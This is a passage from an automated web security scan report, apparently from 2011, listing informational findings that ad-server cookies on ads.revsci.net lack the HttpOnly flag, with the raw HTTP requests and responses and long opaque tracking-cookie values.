Set-Cookie: SECPOP20110512=3392-3-1-72,8,2,1; expires=Fri, 13-May-2011 12:02:12 GMT; path=/
Set-Cookie: CPX=IG=1&VID=fb257e86-0fa0-41bd-822b-b34cfbac2a55&LS=4TIMV11HXVYE6; expires=Sat, 12-May-2012 12:02:12 GMT; path=/
Set-Cookie: CPXSEC=5JK3HOCEHD5=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00&5JK3HWQEL6A=794ZA8LJ0UA05,794ZAAKK4W7C8,5/12/2011 8:02:12 AM -04:00; expires=Sat, 11-Jun-2011 12:02:12 GMT; path=/
Set-Cookie: CPX_IMP=6SQNB131HR1D7|5JK1IIZ8K16=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00&66SRK4O488E00|5JK1J1PH6N1=794ZA8LJ0UA05,794ZAAKK4W7C8,5/12/2011 8:02:12 AM -04:00; expires=Sat, 11-Jun-2011 12:02:12 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 12 May 2011 12:02:11 GMT
Content-Length: 2249

var popurlfull=true;var popped=false;var isChrome = navigator.userAgent.toLowerCase().indexOf("chrome") > -1;var win;function pop(){if (popped) return; popped=true;win = window.open ("http://www.freep
...[SNIP]...

14.56. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_gHx8="MLsXrrEOpxpv55C28tahZ2a57v6B9McZgL6ClJPbnj9y6INXr1ST6VLylaFsMiOIF8KHpjjz7J2U74uKff8LZ0fiJghRv1hoUC4Ww6xSAkmfs1lNuqBVtzyf4hrUHyeaCpV6M2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP7SUvV0rRvErs5Oe05KtUgVRr11fNozw6WGAGmzPHsg6pWeTEHX7jolWibjgwaA/V9oOOLDrbmnazHhTj8SzE3IiH4H0na49aet3nkOO91ZXKayz25agMj02Y7dkjXSVwZ4xpm8C32oMikZ7wKy8X4WHkeLlUVv0d9FQvEIFkw82vwJ/T4/8zCulYzvx0vNKbiJ/sq9LgZHoLnMaeIV8yV89S4G559IlmsZlfhiGKAyN3D1BjqWHBn0Yvipp1a9+adnzbGTPpdYr4JRgNW/40hZ7TVrcaaEnMXJjvErbJbWU2/kifM9+IdSDr24aF0pspxzBL7I83FANAsxBhffSMamxXhQo4MIjim1xDOR2lhyWUi2nGcjntzqDCMC4wCthjwelblqeAmjhTjxxu+ypY+5eOjjQ0ebloC3YciHL0jt/lzpPKK773zxn8o40djk4yXgdhfgGdBEzu723IufB8CJRGM73t38kd3w8MliO5anz4gYExPJgFYUsoC22cJEUjirsoqc8BJ8mXelunr0QTQOUd0oGkxLSY5/uG1seQXR7zpYaDwKVeD3r5rJcYXGxtt3hklTSY8/WKmKt2C5sqgi6OpySZFGYQN0k+rQx/hRLBAzTaRz7PIW1NZPApCPiNubXoAjxFB9G9oi/2d5jlBNCe0+Hf1EMEtPZ7aWFwmlvpDZkMnYMB98lK1RLUBzScu+1MS1w+coLUCbfmLFsAr75oZCeizipWOi6PXTfQc2e3wXc2qrKarr4AlRl9ft8T9A4S5rnvVivQv13nkdWrojhVcqWMin9uYP6rbkwhI2s3c2gpkj/bV0ReY4/awu1kl247Lt/6+ySnvbYqR7Rg4bpMrwM8UOeT5b8XNWcVSQZ98JrOk2e4kibkyQTJTx39DrvGsoSB+K7m76qmF3dokQo8Zbw6S8Knx7KkO+W+I5TqxK2xvOwXrO/dDSAtzxzQOnnuymZ9Mjw5MzE5zUYG38JUNkMoD1GpsZdjqo3WkIphw6Jh8+tdtvV8I7mEPM4x2c+qfq0+YItT+/eBJNxstfHCGrs7P7GOUMnQkBAXEnT44+MpUOzUBryW1Od300eBJuxRcuVw6VQ+wzi473GhREIEVQTVBFDfwlm4SCwTuB4z7JHMi7zZsIA0DUx5OqopBkPxdXyZRHv9EajQ+1M3+gIk9i1jIHjiSKImnPsjdsH"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMVIylDPyYU1H0tRld9SwwgjXvKha3TiO3zK74UdwN9eVOyrK5IpUo0yB9yJWdF8U4552FAyEJbn6rsSYG7uDMANZ4mCoJQ+fbOnGz6eQa0/RwtzNX7YipD+7dbKN5v7/Zu9Z9VvFFtryW+ipH959YzOLPm/YYqONJZUgGRjSLZa3OBq9x98QxSfcY12zUJFWqhJStZHbxgK3do8ybBUSpgLkDGc8bRhyTbRiITdSsqeYFzSfqHMS2NISVM1/hc7NflTipjQsDIt0Sf0nrMmnv/UVhCrQXOmO6tgHbj1eF17QwXOZCSxnzhwuilGScXHKAYMJ9erA7J8pvnvO58BvYyFy/Fy7oo7Rl0fWqaCEguJab8/rl2ktSOKllzZ5Zwlkd9X2XufDh5S68Y9Kxff9yHVBClZd4GMyu+h8+CAPliQ3msrcMeJBPmrWFteEw0g8TUjdn2o8Qqp2UENew6fWI7XR7TJkAWEQGqtSJkWK11UzkmR0qETeNTCM+zwAXtBgLx4uocjZP6jtlepcgQ+f6YqKSqvossJJc6Kgdq/fTO7DHPX3cj7+GbCr1BCwscwxylQh2rovssVJgdVaZtolMmLsn4GNN19XSS4YVHoM44su5dZZ40//lCLjp3tdt5feJ3QDhfBho9YGRegUWc2wbqcsTPtSwEFfyDPkBq2gpsPxuUw8voHfIKqmUXZaENzCWPxWpSDmNYMo8IxvIE0ro6qhRSVfb9HNBaGFJW8piQTq1tJGu5FuYyiij3/KqAEyqA/oORCCRPxDZa6F+HeeaqMpJwv93FI1EV5uucPc2rgNnFKVOADmdI+KyTPcxI08JgW9I3bWEJhaMVNpz+WqM8w40TZ+hh/3TBLUMG9I8luQieecb/2EQWwx17gZnhPNR+Hs7v/0iEkZ91qni8AQS9NFdcrk1S33Gq2lPyQqmVXKQHGBKEH23qJHMODr41vd9GIlnlTT5cCF3YYRn5XGaS2FlaPy9ksq20x8Rto4PUhY55ed/RSDVC7yZhUIKFgfrc0SBQxsypw34g4+smFeDCk2GNdOMr7+xsGrEkJJOxCkBQN30VLnKkkf2F4UEBDIm8qZn+QxTQFIX4GicVlXg0psBMXqe0pHawKdNbSPKoU+sQLBbZS9KgpQN6i4b0cr9PCCInEJmPecX80UysOO7l35W1ax2td2QkZV+JFP8T5Othwh4gXKyaTOjAXwEDaco2NL5bPZyherpF6Z6k0TOooer9pbWGVnm3Pc3PI5mMMcc/1MCoelnRHvt6lpupBrfZo5v69ZwC1ib9NXM6Ggj3E694sq42WcNVdVquhRlNzXOFz8qDI6A9aXYoo1v+y+EheE4HUIxzlQh0tk6SVp7iNwEIEDPOBhL6CK/jxrErtZC7ThF05z7isZaV/RO86qhvvivnQ/gdL58sZ3zCmR34oV3ZDYPBu0fWPutf57j28KxTh29mZK5FfUhXJ9WU4xqjy65be4PrXZMihSw+cCoJlpbyeo4Y5sSityMPjX1m+6EMUZ7eOTzLHaN2zdy/AcC8k2bRtkJc6MQmjmNafWssqqQHK6WhuHFHWgyuXbWrJNYv3R/lc6iKLEhzh+0kI2EUcztqFEOGlXBrKQkvlSXvad7mLnZh1nOVfpg14a/J+IJa3Oq9vOL5bXiNQpIdnvDnZzetcpKnHG9RoJlPw2A1CIERl0rZ8I58Ni9WJKyrugjUsZjaVh9HhJZvYjNLxGzql5phaNf+XP23GQjdsn3Dd9JevWwUunKgWDFRHZs="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__uYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__uYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gHx8="MLsXrrEOpxpv55C28tahZ2a57v6B9McZgL6ClJPbnj9y6INXr1ST6VLylaFsMiOIF8KHpjjz7J2U74uKff8LZ0fiJghRv1hoUC4Ww6xSAkmfs1lNuqBVtzyf4hrUHyeaCpV6M2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP7SUvV0rRvErs5Oe05KtUgVRr11fNozw6WGAGmzPHsg6pWeTEHX7jolWibjgwaA/V9oOOLDrbmnazHhTj8SzE3IiH4H0na49aet3nkOO91ZXKayz25agMj02Y7dkjXSVwZ4xpm8C32oMikZ7wKy8X4WHkeLlUVv0d9FQvEIFkw82vwJ/T4/8zCulYzvx0vNKbiJ/sq9LgZHoLnMaeIV8yV89S4G559IlmsZlfhiGKAyN3D1BjqWHBn0Yvipp1a9+adnzbGTPpdYr4JRgNW/40hZ7TVrcaaEnMXJjvErbJbWU2/kifM9+IdSDr24aF0pspxzBL7I83FANAsxBhffSMamxXhQo4MIjim1xDOR2lhyWUi2nGcjntzqDCMC4wCthjwelblqeAmjhTjxxu+ypY+5eOjjQ0ebloC3YciHL0jt/lzpPKK773zxn8o40djk4yXgdhfgGdBEzu723IufB8CJRGM73t38kd3w8MliO5anz4gYExPJgFYUsoC22cJEUjirsoqc8BJ8mXelunr0QTQOUd0oGkxLSY5/uG1seQXR7zpYaDwKVeD3r5rJcYXGxtt3hklTSY8/WKmKt2C5sqgi6OpySZFGYQN0k+rQx/hRLBAzTaRz7PIW1NZPApCPiNubXoAjxFB9G9oi/2d5jlBNCe0+Hf1EMEtPZ7aWFwmlvpDZkMnYMB98lK1RLUBzScu+1MS1w+coLUCbfmLFsAr75oZCeizipWOi6PXTfQc2e3wXc2qrKarr4AlRl9ft8T9A4S5rnvVivQv13nkdWrojhVcqWMin9uYP6rbkwhI2s3c2gpkj/bV0ReY4/awu1kl247Lt/6+ySnvbYqR7Rg4bpMrwM8UOeT5b8XNWcVSQZ98JrOk2e4kibkyQTJTx39DrvGsoSB+K7m76qmF3dokQo8Zbw6S8Knx7KkO+W+I5TqxK2xvOwXrO/dDSAtzxzQOnnuymZ9Mjw5MzE5zUYG38JUNkMoD1GpsZdjqo3WkIphw6Jh8+tdtvV8I7mEPM4x2c+qfq0+YItT+/eBJNxstfHCGrs7P7GOUMnQkBAXEnT44+MpUOzUBryW1Od300eBJuxRcuVw6VQ+wzi473GhREIEVQTVBFDfwlm4SCwTuB4z7JHMi7zZsIA0DUx5OqopBkPxdXyZRHv9EajQ+1M3+gIk9i1jIHjiSKImnPsjdsH"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMVIylDPyYU1H0tRld9SwwgjXvKha3TiO3zK74UdwN9eVOyrK5IpUo0yB9yJWdF8U4552FAyEJbn6rsSYG7uDMANZ4mCoJQ+fbOnGz6eQa0/RwtzNX7YipD+7dbKN5v7/Zu9Z9VvFFtryW+ipH959YzOLPm/YYqONJZUgGRjSLZa3OBq9x98QxSfcY12zUJFWqhJStZHbxgK3do8ybBUSpgLkDGc8bRhyTbRiITdSsqeYFzSfqHMS2NISVM1/hc7NflTipjQsDIt0Sf0nrMmnv/UVhCrQXOmO6tgHbj1eF17QwXOZCSxnzhwuilGScXHKAYMJ9erA7J8pvnvO58BvYyFy/Fy7oo7Rl0fWqaCEguJab8/rl2ktSOKllzZ5Zwlkd9X2XufDh5S68Y9Kxff9yHVBClZd4GMyu+h8+CAPliQ3msrcMeJBPmrWFteEw0g8TUjdn2o8Qqp2UENew6fWI7XR7TJkAWEQGqtSJkWK11UzkmR0qETeNTCM+zwAXtBgLx4uocjZP6jtlepcgQ+f6YqKSqvossJJc6Kgdq/fTO7DHPX3cj7+GbCr1BCwscwxylQh2rovssVJgdVaZtolMmLsn4GNN19XSS4YVHoM44su5dZZ40//lCLjp3tdt5feJ3QDhfBho9YGRegUWc2wbqcsTPtSwEFfyDPkBq2gpsPxuUw8voHfIKqmUXZaENzCWPxWpSDmNYMo8IxvIE0ro6qhRSVfb9HNBaGFJW8piQTq1tJGu5FuYyiij3/KqAEyqA/oORCCRPxDZa6F+HeeaqMpJwv93FI1EV5uucPc2rgNnFKVOADmdI+KyTPcxI08JgW9I3bWEJhaMVNpz+WqM8w40TZ+hh/3TBLUMG9I8luQieecb/2EQWwx17gZnhPNR+Hs7v/0iEkZ91qni8AQS9NFdcrk1S33Gq2lPyQqmVXKQHGBKEH23qJHMODr41vd9GIlnlTT5cCF3YYRn5XGaS2FlaPy9ksq20x8Rto4PUhY55ed/RSDVC7yZhUIKFgfrc0SBQxsypw34g4+smFeDCk2GNdOMr7+xsGrEkJJOxCkBQN30VLnKkkf2F4UEBDIm8qZn+QxTQFIX4GicVlXg0psBMXqe0pHawKdNbSPKoU+sQLBbZS9KgpQN6i4b0cr9PCCInEJmPecX80UysOO7l35W1ax2td2QkZV+JFP8T5Othwh4gXKyaTOjAXwEDaco2NL5bPZyherpF6Z6k0TOooer9pbWGVnm3Pc3PI5mMMcc/1MCoelnRHvt6lpupBrfZo5v69ZwC1ib9NXM6Ggj3E694sq42WcNVdVquhRlNzXOFz8qDI6A9aXYoo1v+y+EheE4HUIxzlQh0tk6SVp7iNwEIEDPOBhL6CK/jxrErtZC7ThF05z7isZaV/RO86qhvvivnQ/gdL58sZ3zCmR34oV3ZDYPBu0fWPutf57j28KxTh29mZK5FfUhXJ9WU4xqjy65be4PrXZMihSw+cCoJlpbyeo4Y5sSityMPjX1m+6EMUZ7eOTzLHaN2zdy/AcC8k2bRtkJc6MQmjmNafWssqqQHK6WhuHFHWgyuXbWrJNYv3R/lc6iKLEhzh+0kI2EUcztqFEOGlXBrKQkvlSXvad7mLnZh1nOVfpg14a/J+IJa3Oq9vOL5bXiNQpIdnvDnZzetcpKnHG9RoJlPw2A1CIERl0rZ8I58Ni9WJKyrugjUsZjaVh9HhJZvYjNLxGzql5phaNf+XP23GQjdsn3Dd9JevWwUunKgWDFRHZs="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:03:11 GMT

GIF89a.............!.......,...........D..;

14.57. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_dq3p="MLsXrrEOpxpv55C28tahZ2a57v4BlC60cICOgIfdHU7g3IqOG/0TqX40neBrVzd037nb4MpJdU9J4M3n1B1eZID1W20+/yIRBatEH08GZdNmvSuX3t2rRXZQzLLDgqTMsw5VG48uUeoMHBtCDHO43j1F0h376DWK7wrh9HF5wt0G1j04lpuTBJpmu+MKhYe39rt6ERHRfan6oZFqW4jIdIeBfQV1DnfKeVgR1k3AusB9K7AS3X20oQ+kbUsb1G20iS8IC5AreamP2nJ9XACJGTHLVn5e0LSMwW1dRipoWcv6bZ0Md/Lt18gMd2LIFno9nwx4Aoc55eOyKOsiGd1DYiADtXH7yNZKbhiLeBhUNGSVscpPIVVjqm6STXhk1QYbQpm1bUp26NxOedCCK0OJ8yEIiYgHDihUvnxx8J1Ny+HEb8Tyl3PSoLnVQirLGs9MwIPEWGig20VtDBoA86xDpaJ/eMzOO6zvd0GOrb4opbwcJrKqsitiyr8/QAnLfnvDFjcyl4QlTMBbV9ZHh73+RGiQvxY+3xyx4fBm9jmhA6rnNZmI+SR2UaVCZ5nW9K7dFwlqvP3rcrxJN32ehqay6eVnZ2uoGtDr8jpdOWCVtP2i9VkLP3YvnCN9BV7TJ6+Kh09njZnyrQNCwIErSgHDd3gXwoFr7v4DL2zY8K5NlbkhRo8/f//okhQ/Egtf1331cnGiUIzZminlHY+7V1kybEdXXtQl4qFrCWJh5jGjuccdaG5+A76Drn0+9+JJlUnxCROOtVPoKaQB6HDwwmvRaRxQJi1aIY6xhViQaGiucjmPtYNCdgDfJlsMAwsNoIGv2v5AsTz4GfgLyzqjAKfYanuveFsMU8cmo5vM2TpdLil7GdbOZcnaJseqt0JLRR3WYo+NDaPUlfOb8srT2RubiU6ioPfDSrieTPVcE1YYtTiBtZAvI43I5p5SAVHJSUm+3QcNfvRFSgywlow3Wk+r2saD8FrK8HjhxcZ4XJbqs82NG+jTLLSc4Egr/N+EdtoIznjMio5yPU0WXpFw8P97rgdsKMoLfmO25SPIg7YPQFiy1Jnq3T8hxl2kbLevIAee6gzFGr4APCQx5HDKDvBdjvHtpBFyKy4HMYPT73fIlT77Wcd1/lilbhvocIAYyl0suECwcqRX3JJIWj5XRaf3i98dxDrTgzHUnUCGgkDOH31RtEN/85ZY8KhgqhDGDBEAtl32LQF9vosMQCkX42jJckOS+YQKJswk9U8z/hftsmoDss/h50f691A0qb54fk950d/Q58HcDUbWRkXAGeIsqyY4+zul4QRwFqmXbceUueLl1/iF/A9dWGsRBgMY2BckpnmctCBeAOtG6LMjtKIRs9SR4O3lltDeXd5E"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMV4y+jOBYULQEE166YFQ6DmFfDqOqv5R26co+k4LEEzVkoRrop8y5ZQYFpxPJjE5QxDQ+XEMEfjZitbQaI0OEcBlgm3HbVBapZBUj4gebsoESY1gQB4r5K9z/LbiN+Yckov9ICfghisfVIqvqy/On8Ei0lvf8hzbkmU4m+SI32a4ytiDf3yl/4bMAhB9O71/oNYrYPnNoN8e7HT/bQsHiapEXfW4FGP5SDBz/WMK8qt+HrvFkkILMltGi/KhPZvMYpSNMRCXer+0XoQe0vjN5e2yzsORfl/C2VuuSzoI1te3hcaQrtt1CpNqLOGy6Tduv90yVOuuyk6pvs7EySgEIm48o9iklXltCb9za/GnRk4zy39xByfOshbqnZZm8zU97WhojHzdzjrRSYuKYaNaY/fhOZ/2YOUfTaG9ZnfRJ0QaA0FGoTNaHFDsfz7e2qYlKU5tVSvnHLU9+PJZHgvtLWdTrly7qN6BkH8lUf73fnrVMvyBVqij6fKKFcjil2V+KxJNzFiqhmI49Guihwq0V+LbkkHdckgzgyfylLNbdI9B6/XUYOB4wTNHU1IHl+WxOrS0Aa0Ikbu1wE9zuu+mGK3XF5rLQ5FSoo3Gyw0ljuxKt3lEUylLa8b4kE2aFiz+mCXvyVAJw8ySz5ps0PE2yC0kCH91/GzXp89h7+7AAqeZchiZg/og9Bv4Hmw/jGVPDR1/zN3aH0zWSAEz2kKnnwIVSDClrIjB7xT/VhzNuxv63WFmrJ3ZJSPRuGRQVdggZWwCtkTwdnH8GRyXFnx9GkYS8TTen3H661spcy7DpahRVmp5lXdgxhnE33yfW4sQKHTAb3c5epjGaj6U0gUFED0E19Pn0xpixcyO8CGSy6hhBCeCLF1Dx+ls9t9DFI0NVEj8uX41XKLBjTpILO5zlE3W49qXKKM1Oor9IKD5xhfspnJnKs6c/+9PebY2bUA/jSBu+Ztpb9VQsKx0YxvKTzA6puaEQucj3RjMaIez7OtZGHjz3neEG0idQEYfpym6ypCSkvCvg8ONhccwq6prbTtPEPXdrJUYxshgKjywWk/peVnjMU/jBSkwu4EurjmHloS0+M+8Sl1WdeJWM+IioB3kwKUUbNJtOCjLH9ch1E4XCjXNtWME7WHRmRL8oA1NR1XqKUmjzBzgawSq59nlSoBBAiLcd8C3MrpOVX2tf/Ljyk7kzMFSIb/gaas31hfdOY0y6FHTCeFh5PtNJBFoagjoC9/N0dx5yZAnjocXexh+h3z7kcP7XHApMRxd1XYAOvCnwgnSHHag5xCgMt1QYgrKmmwesxNAcPluGEKvHibMmsKnsbmooKkRiFaGIscYNs0O3XvMfq2aCe4qa9NYgcUiT4bi7OVSsT1v8r7RmHK+9/BJrxt4QekRalP4p9fyj6EhHfJmyaaeMh7rHN8L45tnMVPk+rkW2c/ayzrWRzy7xPzvi6Nw9w7Kcb0sxcEKIPiVdUbZNyd82b5D6P2tkPlgX3UMdI06BUaGrEdT1JmHbOAk2OfUcX8hU1JmXffWSz1kg9zmXCL5tCgZlfRy0YD6TrIGns0lcy2+c3WlAvuIswT+0qfAnNjqOaXAHRL+cSkk8KWXSwoI6KAgzkOupp+isEbiubcFeysr4jS92TZroAY9PsaBjog3y7CYBr/55Fqy80O8h8UljjWeBVz2KDTZVMMmVwspszcpxbRogYGFVjL/+d7uMGcEYjL7HNTs70qLF5x3gdWdVLOCfamEiYNZj1Quri2A0MZVr0r1zcOTh3xI3Wza5LOBi5mI0Og8bsVGiCBxzJfEw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-1009698-703456-621393-665981-1268392-317325-1198035-1049794-1238051-481602-185980-770484-757774-74560-1086373-1196055-1086372-1215295-1264419-593881-1236954-1086371-1086370-1086369-926097-1236953-1196051-1236950-1236951-1147048-107089-1096152-1049851-1063912-1166710-1063916-588118-1063911-1063910-1215322-1009546-715901-1023315-715883-725071-109108-75921-1081817-1006093-617983-86237-1006089-1009578-1049785-1191521-1201817-1086731-641525-1049788-124865-1284585-1086733-1077940-1044410-1093100-613349-1010298-397181-672502-1009462-397180-1044578-1010301-1041270-1020427-1093092-1093093-1049769-1049770-596293-576685-596292-1049772-596291-1044587 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://media.ft.com/h/subs.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4def57e5&0&&4dc8e6f8&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPIRxS7gdG4nwPCqf6GGn7aMZB+wNajXBF+Nd1a01tm80x2HLZXYXYhFrnW54ugjciqgGm0tFOfpQeajGmdmQRYo7iifhXcq3Wbs+0M+s7Er2k8tdZWVCBvtko5Zjp8Cj5v2E8ykI+gHIp9/hRPdDeYJcxcbADkCInkuWb3Npj5APREYj/xsHpSZBntv8EoAPRzrJrHWs2DOkRntedZLjOdhyHvTXN5pS4V7upcIjIuq2z7/nsdjrAMbyqK4kakCxviNxTGNlMARgyVMGXMgEZ2MLmd9Zbk6kIOT4fYg/J9/u3Chb6WYqZH/gV9G+oqdCe0W2L6aw0qpg1Y3BGqAUEvNq0wvrdVS7MvhTer7OYchsu6sTh/u9Gx6BNO3snaQim+a62aktgfQiAKgkbpSF0g6cYHhhiyEFKwRC3npVrJ8/n2a2ovJdrav5tzyZWxscutuDcLLKfMWG1aDzsJbjDhFz2ddOIynfvJZctFB3b642LkOMBqRzuhpRVS0fgTcqmLx1keW2dFZvbqqC46u+lqciRYAyQyep75BilOD63Cj5ePrU2dYqoElDy1Q1zuhixxdNaYw9GYvIHwZqfDGLhllmm6jaYnrUSeU99lAYeebrrwB0w6Ss8l6yO8a3fMhnvkEhGRAc4dRmSBXIglruiT3OQ2Sy2583rqhTZEKzHPTgqj+vWqN/4sa/d7YtbZAPV7ZMr01URBWAwka6PgCHcBRUt5tvpqMxBw3J5v8cflNbQMJTZqakbw/kZnwNRNyDgpVxP5WWW8hyAESrsHJF6BoiekbZ+a17IqqEtet6Ps3M3KVki7DJtb4R8rt2+XcLazxCdO977gYFd3hKll5dpzZ93z4Z6NosW5/fSxPmw0enLLbCda7zg0Vqrdnw1uXgPkuiNsn5D8PQ92/UW2lFCIvX2kUBiaRsXjgjbttbky196hNLztjQJdAKEkJmoD9Po1VF/Q2z+kAkXPcJgQAJrfPqO/AqKJA6hLL/IaTIL9asqXLCkO8JzvGwzbmLuFdzlqjdXBEQBJruGD750oA4VbPahg2RF3BbsBBfKOU1w3x64Y0JY/AcLuk6374bkWMKsbigZmqBmjxn34pzoiCsF4/QetnQHdIgvQUvl2RDSzSZGSXknTcaWtLYdMFf0snFL7u9LmBRlIadUGBur5qdwbM72e+34rOTffbJzWjRqH4m7UoKb3/bCiCwAygp71VgqahtO6s92x8FQLUppqTeUdLBVIASTHDpP32AiUEJiUZaAIl1/S0GPjsuBgV/YRFkUw+/7ngkZTEUqwOiy8Q+8bLyk6rct3FjNQEZcSLDuJoIyyzyhb4OVT4cYIqNqkLnRiL6vYqUStAMDKWCXoGRGFWbbnPgT89BL26vRV7EF5Zs47HQMdwcgfd5Ticg1NzMi6mmwQ0y9DrCkZh8Be4luXrF3JUgZbOxmeNU9kgCBKcZqkCH3y1JiU81vGbJ7FxRBbHB/pWIncUViSCYDZnySw=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4k+huXIQJ/AtY6gquhpCIKGAuq5fRa4Xl2IwC9pU+w6+9L42y41oDVUZb5s2bNa8jabVhWkrYcW9POLzC7mHn5XD+5kcRm9Ej7OPPmzGczLoQGAD4+mlCyw1VhRVLxG4hQ+WCi21gUr1ZTPL+gruAevoha7OGS623K8xyA07dj6zPJv+H/0n6817hXlqwQfDZkcIZI4MygcHJgoh426dFtLca2rjxg53k26V+5cxXgxVhg5Mb891U80/TjH9HHMhjrO61YWNi0gSNWS8WB/dbuAPnYyU+uFxoQIEv39QJMZYNbCJnUEVadipzIbXmIHFV8qNgwTXBP1iNqAqAjjHp338NIdd66GdSn48uSpCARemp8gQV3SRH4BGjpiBvpEd6arJtCCrS0Q18zylDuA74Y/tjQsUgCkiPmWxMMHriAR57SkGjQB6IRofvnzP2o6PFvv3ncBd4f/VtJaldXotvOVDnXOBcDqggJOR4z4zmZZ1E4kq6aYkMl1T3NJwVCCedTPtTvf01xbZ6WsvT5EFH9XRpLThbdUwXrhbAZ7XduchtE3zmWdITSVJKxKuUfiVDExBuSoAwxpaJj8l0B3MbY5gNyWjzjVSpveP9Qo7M4FeavFhqutbd8wrzm42JWbjOsRVvSL7bD7Vqmp+5iMziT2So9Cvzzn9voLENSuDHm090ZTdD7JK7Yd2leZkDlAaU1xWaFdQoXw5QJyBEGVY74DjT0GR5x/xL9797vXdoq6K3Q6K4+J2xBotqJtffqJViL1GA7Sb0GD5D37eSWaX3J6vfWA=; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; 